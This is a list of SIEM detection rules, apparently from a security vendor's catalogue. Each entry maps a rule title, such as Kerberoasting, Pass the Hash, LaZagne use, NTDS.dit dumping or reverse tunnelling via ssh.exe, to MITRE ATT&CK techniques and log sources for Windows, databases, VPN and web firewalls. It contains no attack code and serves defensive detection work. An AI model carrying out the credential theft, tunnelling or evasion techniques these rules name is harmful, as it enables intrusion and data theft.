Microsoft

Windows

RV-D-460

Loading of a non-existent DLL for the IKE, IKEEXT, SessionEnv services

TA0005 (Defense Evasion), TA0003 (Persistence)

T1574 (Hijack Execution Flow), T1574.001 (Hijack Execution Flow: DLL), T1574.002 (DLL Side-Loading)

Sysmon

Microsoft

Windows

RV-D-461

Suspicious package loaded by the LSA process

TA0003 (Persistence), TA0004 (Privilege Escalation)

T1547 (Boot or Logon Autostart Execution), T1547.005 (Boot or Logon Autostart Execution: Security Support Provider)

Security

Microsoft

Windows

RV-D-462

Replacement of Windows screensaver files detected

TA0003 (Persistence)

T1546 (Event Triggered Execution), T1546.002 (Event Triggered Execution: Screensaver)

Sysmon

Microsoft

Windows

RV-D-463

User added to critical domain groups

TA0003 (Persistence)

T1098 (Account Manipulation), T1098.007 (Account Manipulation: Additional Local or Domain Groups)

Security

Microsoft

Windows

RV-D-464

User added to critical local groups

TA0003 (Persistence)

T1098 (Account Manipulation), T1098.007 (Account Manipulation: Additional Local or Domain Groups)

Security

Microsoft

Windows

RV-D-465

Account manipulation via third-party software

TA0003 (Persistence)

T1098 (Account Manipulation), T1136 (Create Account), T1136.001 (Create Account: Local Account), T1136.002 (Create Account: Domain Account)

Security

Microsoft

Windows

RV-D-466

Use of BITS jobs detected

TA0003 (Persistence)

T1197 (BITS Jobs)

PowerShell, Security, Sysmon

Microsoft

Windows

RV-D-467

Security-enabled global group deleted

TA0003 (Persistence)

T1098 (Account Manipulation)

Security

Microsoft

Windows

RV-D-468

Detection of WMI subscription creation

TA0002 (Execution)

T1047 (Windows Management Instrumentation), T1546 (Event Triggered Execution), T1546.003 (Event Triggered Execution: Windows Management Instrumentation Event Subscription)

Security

Microsoft

Windows

RV-D-469

Remote thread creation using the LoadLibrary function

TA0005 (Defense Evasion)

T1055 (Process Injection), T1055.001 (Process Injection: Dynamic-link Library Injection)

Sysmon

Microsoft

Windows

RV-D-470

Remote thread creation by a suspicious process

TA0005 (Defense Evasion), TA0004 (Privilege Escalation)

T1055 (Process Injection)

Sysmon

Microsoft

Windows

RV-D-471

Default domain Group Policy modified

TA0005 (Defense Evasion), TA0004 (Privilege Escalation)

T1484 (Domain or Tenant Policy Modification), T1484.001 (Domain or Tenant Policy Modification: Group Policy Modification)

Security

Microsoft

Windows

RV-D-472

Access token theft from a system process

TA0004 (Privilege Escalation)

T1134 (Access Token Manipulation), T1134.001 (Access Token Manipulation: Token Impersonation/Theft)

Sysmon

Microsoft

Windows

RV-D-473

Group Policy object deleted

TA0005 (Defense Evasion), TA0004 (Privilege Escalation)

T1484 (Domain or Tenant Policy Modification), T1484.001 (Domain or Tenant Policy Modification: Group Policy Modification)

Security

Microsoft

Windows

RV-D-474

Group Policy attributes modified

TA0004 (Privilege Escalation)

T1484 (Domain or Tenant Policy Modification), T1484.001 (Domain or Tenant Policy Modification: Group Policy Modification)

Security

Microsoft

Windows

RV-D-475

Token theft via named pipes

TA0005 (Defense Evasion)

T1134 (Access Token Manipulation), T1134.001 (Access Token Manipulation: Token Impersonation/Theft)

Sysmon

Microsoft

Windows

RV-D-476

Non-system process elevated privileges to SYSTEM (CreateProcessWithToken)

TA0004 (Privilege Escalation)

T1134 (Access Token Manipulation)

Security

Microsoft

Windows

RV-D-477

Non-system process elevated privileges to SYSTEM

TA0004 (Privilege Escalation)

T1134 (Access Token Manipulation)

Security, Sysmon

Microsoft

Windows

RV-D-478

Security descriptor modification in Group Policy

TA0005 (Defense Evasion), TA0004 (Privilege Escalation)

T1484 (Domain or Tenant Policy Modification), T1484.001 (Domain or Tenant Policy Modification: Group Policy Modification)

Security

Microsoft

Windows

RV-D-490

Data search in Windows network shares

TA0009 (Collection)

T1039 (Data from Network Shared Drive)

Security

Microsoft

Windows

RV-D-491

Archives placed in a Windows network share

TA0009 (Collection)

T1074 (Data Staged), T1074.002 (Data Staged: Remote Data Staging), T1560 (Archive Collected Data)

Security

Microsoft

Windows

RV-D-493

Access to a sensitive Windows network share

TA0009 (Collection)

T1039 (Data from Network Shared Drive)

Security

Microsoft

Windows

RV-D-494

Use of the Smbtakeover utility

TA0006 (Credential Access), TA0008 (Lateral Movement), TA0002 (Execution)

T1021 (Remote Services), T1021.002 (Remote Services: SMB/Windows Admin Shares), T1047 (Windows Management Instrumentation), T1557 (Adversary-in-the-Middle), T1557.001 (Adversary-in-the-Middle: LLMNR/NBT-NS Poisoning and SMB Relay)

Security, Sysmon

Microsoft

Windows

RV-D-495

Safe Mode boot configuration modification

TA0005 (Defense Evasion)

T1562.009 (Impair Defenses: Safe Mode Boot)

Security, Sysmon

Microsoft

Windows

RV-D-508

Disk data destruction on Windows

TA0040 (Impact)

T1561 (Disk Wipe), T1561.001 (Disk Wipe: Disk Content Wipe), T1561.002 (Disk Wipe: Disk Structure Wipe)

PowerShell, Security, Sysmon

Microsoft

Windows

RV-D-519

Bad USB attack on Windows

TA0001 (Initial Access), TA0002 (Execution)

T1091 (Replication Through Removable Media), T1092 (Communication Through Removable Media), T1200 (Hardware Additions), T1674 (Input Injection)

Security, Sysmon

Microsoft

Windows

RV-D-529

Remote exploitation of the Excel.Application DCOM object

TA0008 (Lateral Movement)

T1021 (Remote Services), T1021.003 (Remote Services: Distributed Component Object Model)

Security

Microsoft

Windows

RV-D-530

Remote browser debugging on Windows

TA0009 (Collection)

T1185 (Browser Session Hijacking), T1539 (Steal Web Session Cookie)

Security, Sysmon

Microsoft

Windows

RV-D-531

Removal of the MOTW mark on Windows

TA0005 (Defense Evasion)

T1553 (Subvert Trust Controls), T1553.005 (Subvert Trust Controls: Mark-of-the-Web Bypass), T1564 (Hide Artifacts), T1564.004 (Hide Artifacts: NTFS File Attributes)

Sysmon

Microsoft

Windows

RV-D-532

Code Signing attack on Windows

TA0005 (Defense Evasion)

T1553 (Subvert Trust Controls), T1553.002 (Subvert Trust Controls: Code Signing)

Security, Sysmon

Microsoft

Windows

RV-D-533

SIP Hijacking on Windows

TA0005 (Defense Evasion)

T1553 (Subvert Trust Controls), T1553.003 (Subvert Trust Controls: SIP and Trust Provider Hijacking)

Security, Sysmon

Microsoft

Windows

RV-D-534

CS Policy Modification attack

TA0005 (Defense Evasion)

T1553 (Subvert Trust Controls), T1553.002 (Subvert Trust Controls: Code Signing), T1553.006 (Subvert Trust Controls: Code Signing Policy Modification)

Security, Sysmon

Microsoft

Windows

RV-D-535

Steganography detection on Windows

TA0011 (Command and Control), TA0005 (Defense Evasion)

T1001 (Data Obfuscation), T1001.002 (Data Obfuscation: Steganography), T1027 (Obfuscated Files or Information), T1027.003 (Obfuscated Files or Information: Steganography)

PowerShell, Security, Sysmon

Microsoft

Windows

RV-D-537

Clipboard content extraction on Windows

TA0009 (Collection)

T1115 (Clipboard Data)

PowerShell, Security, Sysmon

Microsoft

Windows

RV-D-539

Credential search in Group Policies

TA0006 (Credential Access)

T1552 (Unsecured Credentials), T1552.006 (Unsecured Credentials: Group Policy Preferences)

Security

Microsoft

Windows

RV-D-540

Remote thread creation in the Lsass process

TA0004 (Privilege Escalation)

T1055 (Process Injection), T1055.003 (Process Injection: Thread Execution Hijacking)

Sysmon

Microsoft

Windows

RV-D-541

RDP session hijacking

TA0008 (Lateral Movement)

T1563 (Remote Service Session Hijacking), T1563.002 (Remote Service Session Hijacking: RDP Hijacking)

Security, Sysmon

Microsoft

Windows

RV-D-542

Credential retrieval from the registry

TA0006 (Credential Access)

T1552 (Unsecured Credentials), T1552.002 (Unsecured Credentials: Credentials in Registry)

PowerShell, Security, Sysmon

Microsoft

Windows

RV-D-543

Use of the TikiTorch utility

TA0004 (Privilege Escalation)

T1055 (Process Injection), T1055.003 (Process Injection: Thread Execution Hijacking)

Sysmon

Microsoft

Windows

RV-D-544

Pass the Ticket attack

TA0005 (Defense Evasion)

T1550 (Use Alternate Authentication Material), T1550.003 (Use Alternate Authentication Material: Pass the Ticket)

Security, Sysmon

Microsoft

Windows

RV-D-545

Pass the Hash attack

TA0005 (Defense Evasion)

T1550 (Use Alternate Authentication Material), T1550.002 (Use Alternate Authentication Material: Pass the Hash)

Security, Sysmon

Microsoft

Windows

RV-D-573

HTML/SVG Smuggling detection on Windows

TA0005 (Defense Evasion)

T1027 (Obfuscated Files or Information), T1027.006 (Obfuscated Files or Information: HTML Smuggling), T1027.017 (Obfuscated Files or Information: SVG Smuggling)

Sysmon

Microsoft

Windows

RV-D-574

Account hiding via the Windows registry

TA0005 (Defense Evasion)

T1564 (Hide Artifacts), T1564.002 (Hide Artifacts: Hidden Users)

Security, Sysmon

Microsoft

Windows

RV-D-575

Compromise via KrbRelayUp

TA0004 (Privilege Escalation)

T1068 (Exploitation for Privilege Escalation)

Security, Sysmon

Microsoft

Windows

RV-D-580

Suspicious process created by hh.exe

TA0005 (Defense Evasion)

T1218 (System Binary Proxy Execution), T1218.001 (System Binary Proxy Execution: Compiled HTML File)

Security, Sysmon

Microsoft

Windows

RV-D-581

File permission modification

TA0005 (Defense Evasion)

T1222 (File and Directory Permissions Modification), T1222.001 (File and Directory Permissions Modification: Windows File and Directory Permissions Modification)

Security

Microsoft

Windows

RV-D-582

Remote file download using hh.exe

TA0005 (Defense Evasion)

T1218 (System Binary Proxy Execution), T1218.001 (System Binary Proxy Execution: Compiled HTML File)

Security, Sysmon

Microsoft

Windows

RV-D-595

DLL loading using mavinject

TA0005 (Defense Evasion)

T1218 (System Binary Proxy Execution), T1218.013 (System Binary Proxy Execution: Mavinject)

Security, Sysmon

Microsoft

Windows

RV-D-596

Execution of multiple suspicious commands

TA0007 (Discovery)

T1018 (Remote System Discovery), T1046 (Network Service Discovery), T1047 (Windows Management Instrumentation), T1049 (System Network Connections Discovery), T1059 (Command and Scripting Interpreter), T1059.001 (Command and Scripting Interpreter: PowerShell), T1059.003 (Command and Scripting Interpreter: Windows Command Shell), T1082 (System Information Discovery), T1087 (Account Discovery), T1087.001 (Account Discovery: Local Account), T1087.002 (Account Discovery: Domain Account), T1124 (System Time Discovery), T1482 (Domain Trust Discovery)

Security, Sysmon

Microsoft

Windows

RV-D-597

PowerShell command history cleared on Windows

TA0005 (Defense Evasion)

T1070 (Indicator Removal), T1070.003 (Indicator Removal: Clear Command History)

PowerShell, Security, Sysmon

Microsoft

Windows

RV-D-598

Kerberoasting attack

TA0006 (Credential Access)

T1558 (Steal or Forge Kerberos Tickets), T1558.003 (Steal or Forge Kerberos Tickets: Kerberoasting)

Security, Sysmon

Microsoft

Windows

RV-D-599

Persistence via Office Template Macros

TA0003 (Persistence), TA0005 (Defense Evasion)

T1112 (Modify Registry), T1137 (Office Application Startup), T1137.001 (Office Application Startup: Office Template Macros)

Sysmon

Microsoft

Windows

RV-D-600

Persistence via Office Test

TA0003 (Persistence), TA0005 (Defense Evasion)

T1112 (Modify Registry), T1137 (Office Application Startup), T1137.001 (Office Application Startup: Office Template Macros)

Sysmon

Microsoft

Windows

RV-D-601

Persistence via Outlook Home Page

TA0003 (Persistence)

T1137 (Office Application Startup), T1137.004 (Office Application Startup: Outlook Home Page)

Security, Sysmon

Microsoft

Windows

RV-D-602

Persistence via Microsoft Office Add-ins

TA0003 (Persistence)

T1137 (Office Application Startup), T1137.006 (Office Application Startup: Add-ins)

Sysmon

Microsoft

Windows

RV-D-603

Source code compilation detected on Windows

TA0005 (Defense Evasion)

T1027 (Obfuscated Files or Information), T1027.004 (Obfuscated Files or Information: Compile After Delivery)

Security, Sysmon

Microsoft

Windows

RV-D-604

File hiding via attrib.exe

TA0005 (Defense Evasion)

T1564 (Hide Artifacts), T1564.001 (Hide Artifacts: Hidden Files and Directories)

Security, Sysmon

Microsoft

Windows

RV-D-605

PowerShell window launched in hidden mode

TA0005 (Defense Evasion)

T1564 (Hide Artifacts), T1564.003 (Hide Artifacts: Hidden Window)

PowerShell, Security, Sysmon

Microsoft

Windows

RV-D-606

Data hiding in NTFS file attributes

TA0005 (Defense Evasion)

T1564 (Hide Artifacts), T1564.004 (Hide Artifacts: NTFS File Attributes)

Sysmon, PowerShell

Microsoft

Windows

RV-D-607

Deletion of temporary RDP files on Windows

TA0005 (Defense Evasion)

T1070 (Indicator Removal), T1070.007 (Indicator Removal: Clear Network Connection History and Configurations)

PowerShell, Security, Sysmon

Microsoft

Windows

RV-D-608

Deletion of RDP connection history via the registry

TA0005 (Defense Evasion)

T1070 (Indicator Removal), T1070.007 (Indicator Removal: Clear Network Connection History and Configurations)

Security, Sysmon

Microsoft

Windows

RV-D-617

MSBuild launched for code execution

TA0005 (Defense Evasion)

T1127 (Trusted Developer Utilities Proxy Execution), T1127.001 (Trusted Developer Utilities Proxy Execution: MSBuild)

Security, Sysmon

Microsoft

Windows

RV-D-628

Attribute change to hide a file via PowerShell

TA0005 (Defense Evasion)

T1564 (Hide Artifacts), T1564.001 (Hide Artifacts: Hidden Files and Directories)

PowerShell, Security, Sysmon

Microsoft

Windows

RV-D-629

Remote exploitation of the IMsiServer DCOM object

TA0008 (Lateral Movement), TA0005 (Defense Evasion)

T1021 (Remote Services), T1021.003 (Remote Services: Distributed Component Object Model), T1218 (System Binary Proxy Execution), T1218.007 (System Binary Proxy Execution: Msiexec)

Sysmon

Microsoft

Windows

RV-D-631

Token creation and account impersonation

TA0004 (Privilege Escalation), TA0005 (Defense Evasion)

T1134 (Access Token Manipulation), T1134.002 (Access Token Manipulation: Create Process with Token)

Sysmon

Microsoft

Windows

RV-D-648

Critical services stopped

TA0040 (Impact)

T1489 (Service Stop)

System

Microsoft

Windows

RV-D-659

Process launched as another user

TA0004 (Privilege Escalation), TA0005 (Defense Evasion)

T1134 (Access Token Manipulation), T1134.002 (Access Token Manipulation: Create Process with Token)

Security, Sysmon

Microsoft

Windows

RV-D-660

Parent process PID spoofing

TA0004 (Privilege Escalation), TA0005 (Defense Evasion)

T1134 (Access Token Manipulation), T1134.004 (Access Token Manipulation: Parent PID Spoofing)

Sysmon

Microsoft

Windows

RV-D-661

SID-History modification

TA0004 (Privilege Escalation), TA0005 (Defense Evasion)

T1134 (Access Token Manipulation), T1134.005 (Access Token Manipulation: SID-History Injection)

Security

Microsoft

Windows

RV-D-662

Mark-of-the-Web bypass exploitation

TA0005 (Defense Evasion)

T1553 (Subvert Trust Controls), T1553.005 (Subvert Trust Controls: Mark-of-the-Web Bypass)

Sysmon

Microsoft

Windows

RV-D-663

Remote command execution using PsExec

TA0003 (Persistence), TA0008 (Lateral Movement), TA0002 (Execution)

T1021 (Remote Services), T1021.002 (Remote Services: SMB/Windows Admin Shares), T1543 (Create or Modify System Process), T1543.003 (Create or Modify System Process: Windows Service), T1569 (System Services), T1569.002 (System Services: Service Execution), T1570 (Lateral Tool Transfer)

Security

Microsoft

Windows

RV-D-678

Browser extension added via CLI

TA0003 (Persistence)

T1176 (Software Extensions), T1176.001 (Software Extensions: Browser Extensions)

Security, Sysmon

Microsoft

Windows

RV-D-687

File added to a browser extension directory

TA0003 (Persistence)

T1176 (Software Extensions), T1176.001 (Software Extensions: Browser Extensions)

Security, Sysmon

Microsoft

Windows

RV-D-713

NTLM leak via library-ms (CVE-2025-24071)

TA0006 (Credential Access)

T1187 (Forced Authentication), T1557 (Adversary-in-the-Middle), T1557.001 (Adversary-in-the-Middle: LLMNR/NBT-NS Poisoning and SMB Relay)

Sysmon

Microsoft

Windows

RV-D-715

Use of virtualization tools

TA0005 (Defense Evasion)

T1564 (Hide Artifacts), T1564.006 (Hide Artifacts: Run Virtual Instance)

PowerShell, Security, Sysmon

Microsoft

Windows

RV-D-725

File compression using PowerShell

TA0009 (Collection)

T1560 (Archive Collected Data), T1560.001 (Archive Collected Data: Archive via Utility)

PowerShell

Microsoft

Windows

RV-D-726

Direct disk access via PowerShell

TA0005 (Defense Evasion)

T1006 (Direct Volume Access)

PowerShell

Microsoft

Windows

RV-D-727

Modification of trust relationships between domains

TA0005 (Defense Evasion), TA0004 (Privilege Escalation)

T1484 (Domain or Tenant Policy Modification), T1484.002 (Domain or Tenant Policy Modification: Trust Modification)

Security

Microsoft

Windows

RV-D-728

DDE exploitation via Office detected

TA0002 (Execution)

T1559 (Inter-Process Communication), T1559.002 (Inter-Process Communication: Dynamic Data Exchange)

Sysmon

Microsoft

Windows

RV-D-729

UAC bypass via COM objects

TA0002 (Execution), TA0004 (Privilege Escalation), TA0005 (Defense Evasion)

T1548 (Abuse Elevation Control Mechanism), T1548.002 (Abuse Elevation Control Mechanism: Bypass User Account Control), T1559 (Inter-Process Communication), T1559.001 (Inter-Process Communication: Component Object Model)

Sysmon

Microsoft

Windows

RV-D-731

Use of ssh.exe for NTLM hash theft

TA0006 (Credential Access)

T1187 (Forced Authentication)

Security, Sysmon

Microsoft

Windows

RV-D-732

ssh.exe launched with suspicious parameters

TA0005 (Defense Evasion)

T1202 (Indirect Command Execution), T1218 (System Binary Proxy Execution)

Security, Sysmon

Microsoft

Windows

RV-D-733

Reverse tunnel creation via ssh.exe

TA0011 (Command and Control)

T1572 (Protocol Tunneling)

Security, Sysmon

Microsoft

Windows

RV-D-739

Suspicious DNS queries to a localtoNet domain

TA0011 (Command and Control)

T1572 (Protocol Tunneling)

Sysmon

Microsoft

Windows

RV-D-759

Data exfiltration via finger.exe

TA0010 (Exfiltration), TA0011 (Command and Control)

T1048 (Exfiltration Over Alternative Protocol), T1048.003 (Exfiltration Over Alternative Protocol: Exfiltration Over Unencrypted Non-C2 Protocol), T1105 (Ingress Tool Transfer)

Security, Sysmon

Microsoft

Windows

RV-D-764

Use of the LaZagne utility

TA0006 (Credential Access)

T1003 (OS Credential Dumping), T1003.001 (OS Credential Dumping: LSASS Memory), T1003.004 (OS Credential Dumping: LSA Secrets), T1003.005 (OS Credential Dumping: Cached Domain Credentials), T1552 (Unsecured Credentials), T1552.001 (Unsecured Credentials: Credentials In Files), T1555 (Credentials from Password Stores), T1555.001 (Credentials from Password Stores: Keychain), T1555.003 (Credentials from Password Stores: Credentials from Web Browsers), T1555.004 (Credentials from Password Stores: Windows Credential Manager)

Sysmon

Microsoft

Windows

RV-D-767

NTDS.dit dump creation

TA0006 (Credential Access)

T1003 (OS Credential Dumping), T1003.003 (OS Credential Dumping: NTDS)

Sysmon

OpenVPN

OpenVPN Access Server

RV-D-670

OpenVPN connection from outside Russia

TA0001 (Initial Access)

T1078 (Valid Accounts), T1133 (External Remote Services)

OpenVPN Access Server

OpenVPN

OpenVPN Access Server

RV-D-671

Password guessing against the OpenVPN AS web console

TA0006 (Credential Access)

T1110 (Brute Force), T1110.001 (Brute Force: Password Guessing)

OpenVPN Access Server

OpenVPN

OpenVPN Access Server

RV-D-672

Successful password guessing of an OpenVPN client

TA0006 (Credential Access)

T1110 (Brute Force), T1110.001 (Brute Force: Password Guessing)

OpenVPN Access Server

OpenVPN

OpenVPN Access Server

RV-D-673

Password guessing of an OpenVPN client

TA0006 (Credential Access)

T1110 (Brute Force), T1110.001 (Brute Force: Password Guessing)

OpenVPN Access Server

OpenVPN

OpenVPN Access Server

RV-D-674

Anomalous HTTP request to the Access Server webUI

TA0001 (Initial Access)

T1078 (Valid Accounts), T1133 (External Remote Services)

OpenVPN Access Server

OpenVPN

OpenVPN Access Server

RV-D-675

Multiple failed HTTP requests to OpenVPN AS

TA0043 (Reconnaissance)

T1190 (Exploit Public-Facing Application), T1595.003 (Active Scanning: Wordlist Scanning)

OpenVPN Access Server

OpenVPN

OpenVPN Access Server

RV-D-676

Access to the OpenVPN keys and certificates file

TA0009 (Collection)

T1074 (Data Staged), T1587 (Develop Capabilities), T1587.003 (Develop Capabilities: Digital Certificates), T1588 (Obtain Capabilities), T1588.004 (Obtain Capabilities: Digital Certificates)

Auditd

OpenVPN

OpenVPN Access Server

RV-D-677

OpenVPN Access Server configuration modification

TA0005 (Defense Evasion)

T1562 (Impair Defenses)

Auditd

Oracle

MySQL

RV-D-512

Privileged user login to MySQL

TA0001 (Initial Access)

T1078 (Valid Accounts), T1078.003 (Valid Accounts: Local Accounts)

percona-audit

Oracle

MySQL

RV-D-513

Password Spraying attack on the MySQL DBMS

TA0006 (Credential Access)

T1110 (Brute Force), T1110.003 (Brute Force: Password Spraying)

percona-audit

Oracle

MySQL

RV-D-514

Successful password guessing against the MySQL DBMS

TA0006 (Credential Access)

T1110 (Brute Force), T1110.001 (Brute Force: Password Guessing)

percona-audit

Oracle

MySQL

RV-D-515

Password guessing against the MySQL DBMS

TA0006 (Credential Access)

T1110 (Brute Force), T1110.001 (Brute Force: Password Guessing)

percona-audit

Oracle

MySQL

RV-D-741

MySQL administrator rights granted

TA0004 (Privilege Escalation), TA0003 (Persistence)

T1098 (Account Manipulation)

percona-audit

Oracle

MySQL

RV-D-742

Viewing of MySQL user data

TA0007 (Discovery), TA0006 (Credential Access), TA0009 (Collection)

T1003 (OS Credential Dumping), T1003.007 (OS Credential Dumping: Proc Filesystem), T1087 (Account Discovery), T1087.001 (Account Discovery: Local Account), T1087.002 (Account Discovery: Domain Account), T1213 (Data from Information Repositories)

percona-audit

Oracle

MySQL

RV-D-743

Mass deletion of MySQL tables

TA0040 (Impact)

T1565 (Data Manipulation), T1565.001 (Data Manipulation: Stored Data Manipulation)

percona-audit

Oracle

MySQL

RV-D-744

User session terminated in MySQL

TA0040 (Impact)

T1531 (Account Access Removal)

percona-audit

Oracle

MySQL

RV-D-745

Database deletion in MySQL

TA0040 (Impact)

T1485 (Data Destruction)

percona-audit

Oracle

MySQL

RV-D-746

MySQL backup creation

TA0006 (Credential Access), TA0009 (Collection)

T1003 (OS Credential Dumping), T1005 (Data from Local System), T1074 (Data Staged), T1074.001 (Data Staged: Local Data Staging)

percona-audit, Auditd

Oracle

MySQL

RV-D-747

Modification/deletion of the MySQL audit table

TA0005 (Defense Evasion), TA0040 (Impact)

T1070 (Indicator Removal), T1070.001 (Indicator Removal: Clear Windows Event Logs), T1562.001 (Impair Defenses: Disable or Modify Tools), T1565 (Data Manipulation), T1565.001 (Data Manipulation: Stored Data Manipulation)

percona-audit

Oracle

MySQL

RV-D-748

MySQL account password change

TA0003 (Persistence), TA0004 (Privilege Escalation)

T1098 (Account Manipulation)

percona-audit

Oracle

MySQL

RV-D-749

Retrieval of the MySQL connection list

TA0007 (Discovery)

T1049 (System Network Connections Discovery)

percona-audit

Oracle

MySQL

RV-D-750

Retrieval of MySQL version information

TA0007 (Discovery)

T1518 (Software Discovery)

percona-audit

Oracle

Oracle Database

RV-D-709

Password Spraying attack on OracleDB

TA0006 (Credential Access)

T1110 (Brute Force), T1110.003 (Brute Force: Password Spraying)

-

Oracle

Oracle Database

RV-D-710

Password guessing against the Oracle DBMS

TA0006 (Credential Access)

T1110 (Brute Force), T1110.001 (Brute Force: Password Guessing)

-

Oracle

Oracle Database

RV-D-711

Oracle DBMS credential manipulation

TA0003 (Persistence)

T1098 (Account Manipulation)

-

Oracle

Oracle Database

RV-D-712

Retrieval of Oracle DBMS user information

TA0007 (Discovery)

T1033 (System Owner/User Discovery)

-

Oracle

Oracle Database

RV-D-714

Oracle database export

TA0010 (Exfiltration)

T1020 (Automated Exfiltration)

Auditd

Oracle

Oracle Database

RV-D-719

Successful password guessing against the Oracle DBMS

TA0006 (Credential Access)

T1110 (Brute Force), T1110.001 (Brute Force: Password Guessing)

-

Oracle

Oracle Database

RV-D-720

Privileged user login to the Oracle DBMS

TA0001 (Initial Access)

T1078 (Valid Accounts)

-

Oracle

Oracle Database

RV-D-721

Search for structure information in OracleDB

TA0007 (Discovery)

T1082 (System Information Discovery)

-

Oracle

Oracle Database

RV-D-722

Search for OracleDB configuration information

TA0007 (Discovery)

T1082 (System Information Discovery)

-

Positive Technologies

Network Attack Discovery

RV-D-618

Replication request from an untrusted DNS server

TA0043 (Reconnaissance)

T1071 (Application Layer Protocol), T1071.004 (Application Layer Protocol: DNS), T1590 (Gather Victim Network Information), T1590.002 (Gather Victim Network Information: DNS)

-

Positive Technologies

Network Attack Discovery

RV-D-619

Attempts to obtain account information

TA0007 (Discovery)

T1087 (Account Discovery), T1087.002 (Account Discovery: Domain Account)

-

Positive Technologies

Network Attack Discovery

RV-D-620

Signs of malicious utility use detected

TA0011 (Command and Control)

T1008 (Fallback Channels), T1021 (Remote Services), T1021.001 (Remote Services: Remote Desktop Protocol), T1029 (Scheduled Transfer), T1071 (Application Layer Protocol), T1071.001 (Application Layer Protocol: Web Protocols), T1071.002 (Application Layer Protocol: File Transfer Protocols), T1090 (Proxy), T1090.001 (Proxy: Internal Proxy), T1090.003 (Proxy: Multi-hop Proxy), T1102 (Web Service), T1102.003 (Web Service: One-Way Communication), T1104 (Multi-Stage Channels), T1132 (Data Encoding), T1529 (System Shutdown/Reboot), T1550 (Use Alternate Authentication Material), T1573 (Encrypted Channel), T1573.002 (Encrypted Channel: Asymmetric Cryptography), T1665 (Hide Infrastructure)

-

Positive Technologies

Network Attack Discovery

RV-D-621

Vulnerability exploitation attempt detected

TA0001 (Initial Access)

T1190 (Exploit Public-Facing Application), T1203 (Exploitation for Client Execution)

-

Positive Technologies

Network Attack Discovery

RV-D-622

DCSync attack

TA0006 (Credential Access)

T1003 (OS Credential Dumping), T1003.006 (OS Credential Dumping: DCSync)

-

Positive Technologies

Network Attack Discovery

RV-D-623

DCShadow attack

TA0005 (Defense Evasion)

T1207 (Rogue Domain Controller)

-

Positive Technologies

Network Attack Discovery

RV-D-624

Suspicious network activity from a single host

TA0002 (Execution)

T1203 (Exploitation for Client Execution)

-

Positive Technologies

Network Attack Discovery

RV-D-625

Indicator of compromise (IOC) detected

TA0011 (Command and Control)

T1071 (Application Layer Protocol)

-

Positive Technologies

Network Attack Discovery

RV-D-626

Suspicious network activity from multiple hosts

TA0002 (Execution)

T1203 (Exploitation for Client Execution)

-

Positive Technologies

Network Attack Discovery

RV-D-627

Signs of traffic tunneling utility use

TA0011 (Command and Control)

T1572 (Protocol Tunneling)

-

Positive Technologies

PT Application Firewall 3

RV-D-560

Page access without browser information

TA0009 (Collection), TA0005 (Defense Evasion)

T1070 (Indicator Removal), T1119 (Automated Collection), T1589 (Gather Victim Identity Information), T1589.002 (Gather Victim Identity Information: Email Addresses), T1589.003 (Gather Victim Identity Information: Employee Names)

-

Positive Technologies

PT Application Firewall 3

RV-D-561

Use of an outdated protocol

TA0005 (Defense Evasion)

T1562.010 (Impair Defenses: Downgrade Attack), T1595 (Active Scanning), T1595.002 (Active Scanning: Vulnerability Scanning)

-

Positive Technologies

PT Application Firewall 3

RV-D-562

Reflected file download attack

TA0001 (Initial Access), TA0011 (Command and Control)

T1105 (Ingress Tool Transfer), T1189 (Drive-by Compromise), T1190 (Exploit Public-Facing Application), T1598 (Phishing for Information), T1598.003 (Phishing for Information: Spearphishing Link)

-

Positive Technologies

PT Application Firewall 3

RV-D-563

Attack on a PT AF web resource

TA0001 (Initial Access), TA0002 (Execution)

T1059 (Command and Scripting Interpreter), T1059.001 (Command and Scripting Interpreter: PowerShell), T1059.003 (Command and Scripting Interpreter: Windows Command Shell), T1059.004 (Command and Scripting Interpreter: Unix Shell), T1059.006 (Command and Scripting Interpreter: Python), T1190 (Exploit Public-Facing Application), T1505 (Server Software Component), T1505.003 (Server Software Component: Web Shell)

-

Positive Technologies

PT Application Firewall 3

RV-D-564

Vulnerability exploitation attempt

TA0001 (Initial Access)

T1190 (Exploit Public-Facing Application)

-

Positive Technologies

PT Application Firewall 3

RV-D-565

Potential web resource page enumeration

TA0043 (Reconnaissance)

T1595 (Active Scanning), T1595.003 (Active Scanning: Wordlist Scanning)

-

Positive Technologies

PT Application Firewall 3

RV-D-566

Web application artifact search

TA0043 (Reconnaissance)

T1595 (Active Scanning), T1595.003 (Active Scanning: Wordlist Scanning)

-

Positive Technologies

PT Application Firewall 3

RV-D-567

Brute Force attack detected

TA0006 (Credential Access)

T1110 (Brute Force), T1110.001 (Brute Force: Password Guessing)

-

Positive Technologies

PT Application Firewall 3

RV-D-568

Password guessing against a login form

TA0006 (Credential Access)

T1087 (Account Discovery), T1087.001 (Account Discovery: Local Account), T1110 (Brute Force), T1110.001 (Brute Force: Password Guessing), T1110.003 (Brute Force: Password Spraying)

-

Positive Technologies

PT Application Firewall 3

RV-D-569

Multiple attacks on a web resource

TA0001 (Initial Access), TA0002 (Execution)

T1059 (Command and Scripting Interpreter), T1059.001 (Command and Scripting Interpreter: PowerShell), T1059.003 (Command and Scripting Interpreter: Windows Command Shell), T1059.004 (Command and Scripting Interpreter: Unix Shell), T1059.006 (Command and Scripting Interpreter: Python), T1190 (Exploit Public-Facing Application), T1505 (Server Software Component), T1505.003 (Server Software Component: Web Shell)

-

Positive Technologies

PT Application Firewall 3

RV-D-570

Attacks on various web resources

TA0001 (Initial Access), TA0002 (Execution)

T1059 (Command and Scripting Interpreter), T1059.001 (Command and Scripting Interpreter: PowerShell), T1059.003 (Command and Scripting Interpreter: Windows Command Shell), T1059.004 (Command and Scripting Interpreter: Unix Shell), T1059.006 (Command and Scripting Interpreter: Python), T1190 (Exploit Public-Facing Application), T1505 (Server Software Component), T1505.003 (Server Software Component: Web Shell)

-

Positive Technologies

PT Application Firewall 3

RV-D-571

Use of a vulnerability scanner

TA0001 (Initial Access), TA0043 (Reconnaissance)

T1190 (Exploit Public-Facing Application), T1595 (Active Scanning), T1595.002 (Active Scanning: Vulnerability Scanning)

-

PostgreSQL

PostgreSQL

RV-D-182

Multiple failed connection attempts to a PostgreSQL database

TA0006 (Credential Access)

T1110 (Brute Force), T1110.001 (Brute Force: Password Guessing)

pgAudit

PostgreSQL

PostgreSQL

RV-D-183

Attempt to dump a PostgreSQL database or credentials detected

TA0006 (Credential Access)

T1003 (OS Credential Dumping)

Auditd, pgAudit

PostgreSQL

PostgreSQL

RV-D-184

Password Spraying attack on the PostgreSQL DBMS

TA0006 (Credential Access)

T1110 (Brute Force), T1110.002 (Brute Force: Password Cracking)

pgAudit

PostgreSQL

